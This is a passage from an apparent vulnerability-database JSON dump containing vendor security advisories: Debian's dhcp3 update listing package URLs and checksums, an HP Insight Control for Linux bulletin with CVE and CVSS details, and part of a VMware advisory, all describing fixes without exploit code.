http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_amd64.deb\r\n Size/MD5 checksum: 120404 4dfcb0d1f42836cac6d5679a1abdfcb9\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_amd64.deb\r\n Size/MD5 checksum: 313190 5da5b48221028fff8d2fe89370ea051d\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_amd64.deb\r\n Size/MD5 checksum: 310328 f6a3ddc984847b078c9e93ad95d82ae4\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_amd64.deb\r\n Size/MD5 checksum: 114232 1980df61d75ea40ebc82c22c7005b3ea\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_amd64.udeb\r\n Size/MD5 checksum: 188412 91cf6d4362473d908f108a45c6e1073c\r\n\r\narm architecture &#40;ARM&#41;\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_arm.deb\r\n Size/MD5 checksum: 103692 0c3678563a2fadc12054811d3c5df5be\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_arm.deb\r\n Size/MD5 checksum: 336338 22a205bb36afdb50717e1187c644ca7f\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_arm.deb\r\n Size/MD5 checksum: 292856 d64219e9efe77445c5b3c2a5834a5f16\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_arm.deb\r\n Size/MD5 checksum: 226548 30e51575f5aad4a17cda75b6277c2298\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_arm.deb\r\n Size/MD5 checksum: 108874 71e3bc13d6e59a98f32f3466291becac\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_arm.udeb\r\n Size/MD5 checksum: 170056 460b6cb3d07249b2bf7a554504815cc3\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_arm.deb\r\n Size/MD5 checksum: 291164 768c6b628b9285007277a884342fff2d\r\n\r\narmel architecture &#40;ARM EABI&#41;\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_armel.deb\r\n Size/MD5 checksum: 293770 aff3c87d606cf2b7cfc8cc2b6a433ee0\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_armel.deb\r\n Size/MD5 checksum: 338686 20e3cf59a67c8d746918378e486adc72\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_armel.deb\r\n Size/MD5 checksum: 109692 228381c7fbead4e0b3e140647c956015\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_armel.deb\r\n Size/MD5 checksum: 103172 04a01c3e2e5eb34b9ca9b89ba6ff0704\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_armel.deb\r\n Size/MD5 checksum: 227394 7afa7ddb6b23887f8a11ae1599c521b6\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_armel.deb\r\n Size/MD5 checksum: 293020 00ed8969e284da3a687e4e6421dbdc3b\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_armel.udeb\r\n Size/MD5 checksum: 170800 2e74568b6974af18c54a8f276157240f\r\n\r\nhppa architecture &#40;HP PA RISC&#41;\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_hppa.deb\r\n Size/MD5 checksum: 116212 bbc799a4068272efbd27845c0b91de4d\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_hppa.udeb\r\n Size/MD5 checksum: 194972 d86d92f993fd03f2177847d0384cdc8e\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_hppa.deb\r\n Size/MD5 checksum: 324480 169c91330d7627dd539342a950c0ede1\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_hppa.deb\r\n Size/MD5 checksum: 315718 e86d7975c3341d02f319f7de97b13045\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_hppa.deb\r\n Size/MD5 checksum: 251748 956834560fde2009ae81efba433ab9b1\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_hppa.deb\r\n Size/MD5 checksum: 127710 f67185d6696ef7104a888053488234f8\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_hppa.deb\r\n Size/MD5 checksum: 369580 cf511b62e1cbced8373103dd23604631\r\n\r\ni386 architecture &#40;Intel ia32&#41;\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_i386.deb\r\n Size/MD5 checksum: 332434 deceed031e4ec70f9a89a3f9f1aa83a6\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_i386.udeb\r\n Size/MD5 checksum: 167142 890e95b663c536bd4794e4eeaf7e4620\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_i386.deb\r\n Size/MD5 checksum: 106664 e9a85ff16968a9b0a982f2650d09b97e\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_i386.deb\r\n Size/MD5 checksum: 224288 ccaea8e386efccf4a9a7b5a66368a18b\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_i386.deb\r\n Size/MD5 checksum: 286932 acd0bd92af229ba24bb9e426e518144f\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_i386.deb\r\n Size/MD5 checksum: 290520 41251b845417290082cead454420009a\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_i386.deb\r\n Size/MD5 checksum: 102132 40ccebf82e99c1f2228d0304c7c10bb0\r\n\r\nia64 architecture &#40;Intel ia64&#41;\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_ia64.deb\r\n Size/MD5 checksum: 400296 447643661f0ef198381636421a817e15\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_ia64.deb\r\n Size/MD5 checksum: 347478 0ee8f2058fca1d30fdcb4eed2e82b6b1\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_ia64.deb\r\n Size/MD5 checksum: 159842 12d61f96202f3f68b9aff09424d79348\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_ia64.deb\r\n Size/MD5 checksum: 508044 130ffd524faa48178f124befdc150e47\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_ia64.deb\r\n Size/MD5 checksum: 464766 bf7266a768cc90bd76c785624cb4089d\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_ia64.udeb\r\n Size/MD5 checksum: 289288 ee79b20eefaf229fb46ada9bc6ae56bf\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_ia64.deb\r\n Size/MD5 checksum: 155048 8ecc258935ffd55300285fc775d9f1b9\r\n\r\nmips architecture &#40;MIPS &#40;Big Endian&#41;&#41;\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_mips.deb\r\n Size/MD5 checksum: 359176 fb5bd87ef5481f1f43c9a45dfcd3ce37\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_mips.deb\r\n Size/MD5 checksum: 309030 90233c8ed44269bba30f16b0e8a84450\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_mips.deb\r\n Size/MD5 checksum: 245844 16982508add38de5d1dc7e465e484d14\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_mips.deb\r\n Size/MD5 checksum: 114538 291ed9f1bc54e3b8082ca4633185796c\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_mips.deb\r\n Size/MD5 checksum: 314358 270b38430ca3b97245c29ac4dc314172\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_mips.udeb\r\n Size/MD5 checksum: 188178 334dd27da8522f16bf58ac31e4d3dac2\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_mips.deb\r\n Size/MD5 checksum: 124312 aef53193ecfafb6c1433223f19242a35\r\n\r\nmipsel architecture &#40;MIPS &#40;Little Endian&#41;&#41;\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_mipsel.deb\r\n Size/MD5 checksum: 362162 67743cf382e17cfab714158bb0f37561\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_mipsel.deb\r\n Size/MD5 checksum: 247664 b5494e175f7be190ddb2390d2b55ca79\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_mipsel.deb\r\n Size/MD5 checksum: 310866 6387812c812dafa3b63ed7b139c48f74\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_mipsel.deb\r\n Size/MD5 checksum: 116224 bf5038fb4e9d79beea543376f91a5404\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_mipsel.udeb\r\n Size/MD5 checksum: 190284 1da972b8dd8e57d7ed1e62b387329d43\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_mipsel.deb\r\n Size/MD5 checksum: 317228 9df2929f942d894260e0783cba8668c0\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_mipsel.deb\r\n Size/MD5 checksum: 125528 34a0a833a1d5626232a7f6b0891d6fa9\r\n\r\npowerpc architecture &#40;PowerPC&#41;\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_powerpc.deb\r\n Size/MD5 checksum: 305096 f3d385927548fe52fde1070280bda9a9\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_powerpc.deb\r\n Size/MD5 checksum: 111500 9d03e2dc815e1f2bb383f677aaf86eb9\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_powerpc.udeb\r\n Size/MD5 checksum: 183812 82bce24908b4088c62c9d6d7622d3ac2\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_powerpc.deb\r\n Size/MD5 checksum: 310594 97b0fd83d73c1aec8784e97a92b77ee1\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_powerpc.deb\r\n Size/MD5 checksum: 354430 0e7fc5b85c1474674e8aa1f506bbf815\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_powerpc.deb\r\n Size/MD5 checksum: 118796 2af645bbf54897306a52a7b072cdded1\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_powerpc.deb\r\n Size/MD5 checksum: 241116 7748b01950150c4cec91d2f361c5e403\r\n\r\ns390 architecture &#40;IBM S/390&#41;\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_s390.deb\r\n Size/MD5 checksum: 303410 0681214517ad4e1746d0f30a6af3854f\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_s390.deb\r\n Size/MD5 checksum: 348930 cda6066a1d5cfa599383e38201b662c0\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_s390.deb\r\n Size/MD5 checksum: 112420 cb2a4679d4d187e6373df2e8fb7de53e\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_s390.udeb\r\n Size/MD5 checksum: 182114 55db5122f2cb6acc7169911f40c5646a\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_s390.deb\r\n Size/MD5 checksum: 117568 6e16df93aabfcb6892de03e3c7d9c35b\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_s390.deb\r\n Size/MD5 checksum: 239446 5c93734c0bd94ef02c726730418ab49c\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_s390.deb\r\n Size/MD5 checksum: 303678 5924002054a4233ea16e4e8769821f49\r\n\r\nsparc architecture &#40;Sun SPARC/UltraSPARC&#41;\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_sparc.udeb\r\n Size/MD5 checksum: 161504 f4ae7e33ec0fae6818f0cae625925ee9\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_sparc.deb\r\n Size/MD5 checksum: 218292 f4b7091a070b4dc413eb4d3e319b88f9\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_sparc.deb\r\n Size/MD5 checksum: 109326 fe50b4989d1b397347621c5c4fef23af\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_sparc.deb\r\n Size/MD5 checksum: 101564 60fd708e4dcda554af9ede9b9cc396a9\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_sparc.deb\r\n Size/MD5 checksum: 280070 7ee763f435a4881ac7f719030e59b8d0\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_sparc.deb\r\n Size/MD5 checksum: 283656 2a79cfc252c6a772d16e34845984a5ac\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_sparc.deb\r\n Size/MD5 checksum: 325588 168e42992477d7e845d1d9bfde4b1cad\r\n\r\n\r\n These files will probably be moved into the stable distribution on\r\n its next update.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: &#96;apt-cache show &lt;pkg&gt;&#39; and http://packages.debian.org/&lt;pkg&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 &#40;GNU/Linux&#41;\r\n\r\niQEcBAEBAgAGBQJKXN4MAAoJEL97/wQC1SS+KcMH/23ILsf1BwOp+a17sitTdhZm\r\noKnIGop6vSyFddnXXvnNiPq9xQDEhZNfqJhwmeKWJ5sqYF4pzSYNU0NIJnsqzih1\r\nAsKRPXsYHnYCKyvq6y0BQ8216JehPw1zmltHB1eHEfDXFHoMGu3M/3NHkAyD3VHq\r\naXty2+UTELODe5CCeic0aa7waJDJGpfZdJYlV7nT4FrarwgLze42LepD9TpfILPX\r\novXg8eNdxu8TufsfwqNZyPfmkQYgeMXGHgPDB0epY3FsOsMQZygNq4r/T20o8UV/\r\nWfvvLTOVAtiRoc6OlyMh3aUtyQ0rbhyOgwwpOHqTyxlpFHsmFHNTj1gZvsvYWB8=\r\n=qS68\r\n-----END PGP SIGNATURE-----\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "cvss3": {}, "published": "2009-07-15T00:00:00", "type": "securityvulns", "title": "[Full-disclosure] [SECURITY] [DSA 1833-1] New dhcp3 packages fix arbitrary code execution", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2009-1892", "CVE-2009-0692"], "modified": "2009-07-15T00:00:00", "id": "SECURITYVULNS:DOC:22168", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22168", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:33", "description": "Buffer overflow on network mask processing.", "cvss3": {}, "published": "2009-07-15T00:00:00", "type": "securityvulns", "title": "ISC DHCP client buffer overflow", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2009-1892", "CVE-2009-0692"], "modified": "2009-07-15T00:00:00", "id": "SECURITYVULNS:VULN:10073", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10073", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:35", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c02286083\r\nVersion: 1\r\n\r\nHPSBMA02554 SSRT100018 rev.2 - HP Insight Control for Linux, Remote Execution of Arbitrary Code, Remote\r\nDenial of Service &#40;DoS&#41;, Remote Unauthorized Access\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2010-07-12\r\nLast Updated: 2010-07-13\r\n\r\nPotential Security Impact: Remote execution of arbitrary code, remote Denial of Service &#40;DoS&#41;, remote\r\nunauthorized access\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with Insight Control for Linux &#40;IC-LX&#41;. The\r\nvulnerabilities could be remotely exploited to allow execution of arbitrary code, remote Denial of Service\r\n&#40;DoS&#41;, and remote unauthorized access.\r\n\r\nReferences: CVE-2009-0692, CVE-2007-5497, CVE-2007-2452, CVE-2010-0001, CVE-2010-1129, CVE-2008-5110\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Insight Control for Linux 6.0 and previous versions\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2009-0692 &#40;AV:A/AC:L/Au:N/C:C/I:C/A:C&#41; 8.3\r\nCVE-2007-5497 &#40;AV:N/AC:M/Au:N/C:P/I:P/A:N&#41; 4.9\r\nCVE-2007-2452 &#40;AV:N/AC:M/Au:S/C:P/I:P/A:P&#41; 6.4\r\nCVE-2010-0001 &#40;AV:N/AC:M/Au:N/C:P/I:P/A:P&#41; 6.8\r\nCVE-2010-1129 &#40;AV:N/AC:L/Au:N/C:P/I:P/A:P&#41; 7.5\r\nCVE-2008-5110 &#40;AV:N/AC:M/Au:N/C:C/I:C/A:C&#41; 10.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nNote: HP Insight Control for Linux v6.1 incorporates updated packages that include security updates for\r\nDhclient, E2fsprogs, Findutils, Gzip, PHP and Syslog-ng.\r\n\r\nRESOLUTION\r\n\r\nHP has provided HP Insight Control for Linux v6.1 to resolve this vulnerability. The updated kit can be\r\ndownloaded as follows. Browse to http://www.hp.com/go/ic-lx and click on Software Downloads.\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\nNone\r\n\r\nHISTORY\r\nVersion:1 &#40;rev.1&#41; - 12 July 2010 Initial Release\r\nVersion:2 &#40;rev.2&#41; - 13 July 2010 Changed abbreviated name to IC-LX\r\n\r\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP\r\nsoftware products should be applied in accordance with the customer&#39;s patch management policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to:\r\nsecurity-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP,\r\nespecially exploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&amp;langcode=USENG&amp;jumpid=in_SC-GEN__driverITRC&amp;topiccode=ITRC\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n -check ALL categories for which alerts are required and continue.\r\nUnder Step2: your ITRC operating systems\r\n -verify your operating system selections are checked and save.\r\n\r\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page: Subscriber&#39;s choice for Business: sign-in.\r\nOn the web page: Subscriber&#39;s Choice: your profile summary - use Edit Profile to update appropriate sections.\r\n\r\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters\r\nof the Bulletin number in the title:\r\n\r\nGN = HP General SW\r\nMA = HP Management Agents\r\nMI = Misc. 3rd Party SW\r\nMP = HP MPE/iX\r\nNS = HP NonStop Servers\r\nOV = HP OpenVMS\r\nPI = HP Printing &amp; Imaging\r\nST = HP Storage SW\r\nTL = HP Trusted Linux\r\nTU = HP Tru64 UNIX\r\nUX = HP-UX\r\nVV = HP VirtualVault\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is\r\ncontinually reviewing and enhancing the security features of software products to provide customers with\r\ncurrent secure solutions.\r\n\r\n&quot;HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the\r\naffected HP products the important security information contained in this Bulletin. HP recommends that all\r\nusers determine the applicability of this information to their individual situations and take appropriate\r\naction. HP does not warrant that this information is necessarily accurate or complete for all user situations\r\nand, consequently, HP will not be responsible for any damages resulting from user&#39;s use or disregard of the\r\ninformation provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either\r\nexpress or implied, including the warranties of merchantability and fitness for a particular purpose, title\r\nand non-infringement.&quot;\r\n\r\nCopyright 2009 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein.\r\nThe information provided is provided &quot;as is&quot; without warranty of any kind. To the extent permitted by law,\r\nneither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or\r\nconsequential damages including downtime cost; lost profits;damages relating to the procurement of substitute\r\nproducts or services; or damages for loss of data, or software restoration. The information in this document\r\nis subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products\r\nreferenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other\r\nproduct and company names mentioned herein may be trademarks of their respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 &#40;GNU/Linux&#41;\r\n\r\niEYEARECAAYFAkw95MoACgkQ4B86/C0qfVnUOACg7rgVtWZ1jWPchP3cgJtpdX48\r\nLg8AoMGWbdYeZGvEnlEfvQfX6AQKBGrK\r\n=mAva\r\n-----END PGP SIGNATURE-----", "cvss3": {}, "published": "2010-07-18T00:00:00", "type": "securityvulns", "title": "[security bulletin] HPSBMA02554 SSRT100018 rev.2 - HP Insight Control for Linux, Remote Execution of Arbitrary Code, Remote Denial of Service &#40;DoS&#41;, Remote Unauthorized Access", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2010-1129", "CVE-2010-0001", "CVE-2007-2452", "CVE-2007-5497", "CVE-2009-0692", "CVE-2008-5110"], "modified": "2010-07-18T00:00:00", "id": "SECURITYVULNS:DOC:24273", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24273", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:15:25", "description": "Multiple bugs, including remote DHCP server vulnerabilities are fixed.", "cvss3": {}, "published": "2007-09-21T00:00:00", "type": "securityvulns", "title": "VMWare software multiple security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2007-4155", "CVE-2007-0062", "CVE-2007-4059", "CVE-2007-4497", "CVE-2007-4496", "CVE-2007-0063", "CVE-2007-0061"], "modified": "2007-09-21T00:00:00", "id": "SECURITYVULNS:VULN:8174", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8174", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:58:44", "description": "&gt;20 vulnerabilities in different applications are fixed.", "cvss3": {}, "published": "2010-07-22T00:00:00", "type": "securityvulns", "title": "Hewlett Packard applications multiple security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2010-1129", "CVE-2010-1968", "CVE-2010-1965", "CVE-2010-1966", "CVE-2009-0696", "CVE-2010-2703", "CVE-2010-1973", "CVE-2010-0001", "CVE-2007-2452", "CVE-2010-1967", "CVE-2010-1969", "CVE-2010-1970", "CVE-2007-5497", "CVE-2009-0692", "CVE-2008-5110", "CVE-2010-1972", "CVE-2010-0083", "CVE-2009-1427", "CVE-2010-1971", "CVE-2010-2704"], "modified": "2010-07-22T00:00:00", "id": "SECURITYVULNS:VULN:11009", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11009", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:23", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA256\r\n\r\n- - -------------------------------------------------------------------\r\n VMware Security Advisory\r\n\r\nAdvisory ID: VMSA-2007-0006\r\nSynopsis: Critical security updates for all supported\r\n versions of VMware ESX Server, VMware Server,\r\n VMware Workstation, VMware ACE, and\r\n VMware Player\r\n\r\nIssue date: 2007-09-18\r\nUpdated on: 2007-09-18\r\n\r\nCVE numbers: CVE-2007-2446 CVE-2007-2447 CVE-2007-0494\r\n CVE-2007-2442 CVE-2007-2443 CVE-2007-2798\r\n CVE-2007-0061 CVE-2007-0062 CVE-2007-0063\r\n CVE-2007-4059 CVE-2007-4155 CVE-2007-4496\r\n CVE-2007-4497 CVE-2007-1856 CVE-2006-1174\r\n CVE-2006-4600 CVE-2004-0813 CVE-2007-1716\r\n CVE-2006-3619 CVE-2006-4146\r\n- - -------------------------------------------------------------------\r\n\r\n1. Summary:\r\n\r\nUpdated versions of all supported hosted products and all ESX 2x\r\nproducts and patches for ESX 30x address critical security updates.\r\n\r\nService Console security updates for samba, bind, krb5, vixie-cron,\r\nshadow-utils, openldap, pam, gcc, and gdb packages.\r\n\r\n2. Relevant releases:\r\n\r\nVMware Workstation 6.0.0\r\nVMware Player 2.0.0\r\nVMware ACE 2.0.0\r\n\r\nVMware Workstation prior to 5.5.5\r\nVMware Player prior to 1.0.5\r\nVMware Server prior to 1.0.4\r\nVMware ACE prior to 1.0.4\r\n\r\nVMware ESX 3.0.2 without patches ESX-1001725 ESX-1001731 ESX-1001726\r\n ESX-1001727 ESX-1001728 ESX-1001729\r\n ESX-1001730\r\n\r\nVMware ESX 3.0.1 without patches ESX-8258730 ESX-1001213 ESX-1001691\r\n ESX-1001723 ESX-1001214 ESX-1001692\r\n ESX-1001693 ESX-1001694 ESX-8253547\r\n ESX-8567382\r\n\r\nVMware ESX 3.0.0 without patches ESX-4809553 ESX-1001204 ESX-1001206\r\n ESX-1001212 ESX-1001205 ESX-1001207\r\n ESX-1001208 ESX-1001209 ESX-1001210\r\n ESX-1001211\r\n\r\nVMware ESX 2.5.4 prior to upgrade patch 10 &#40;Build# 53326&#41;\r\nVMware ESX 2.5.3 prior to upgrade patch 13 &#40;Build# 52488&#41;\r\nVMware ESX 2.1.3 prior to upgrade patch 8 &#40;Build# 53228&#41;\r\nVMware ESX 2.0.2 prior to upgrade patch 8 &#40;Build# 52650&#41;\r\n\r\n3. Problem description:\r\n\r\nProblems addressed by these patches:\r\n\r\nI Arbitrary code execution and denial of service vulnerabilities\r\n\r\n This release fixes a security vulnerability that could allow a\r\n guest operating system user with administrative privileges to cause\r\n memory corruption in a host process, and thus potentially execute\r\n arbitrary code on the host. &#40;CVE-2007-4496&#41;\r\n\r\n This release fixes a denial of service vulnerability that could\r\n allow a guest operating system to cause a host process to become\r\n unresponsive or exit unexpectedly. &#40;CVE-2007-4497&#41;\r\n\r\n Thanks to Rafal Wojtczvk of McAfee for identifying and reporting\r\n these issues.\r\n\r\n ESX\r\n ---\r\n VMware ESX 3.0.1 Download Patch 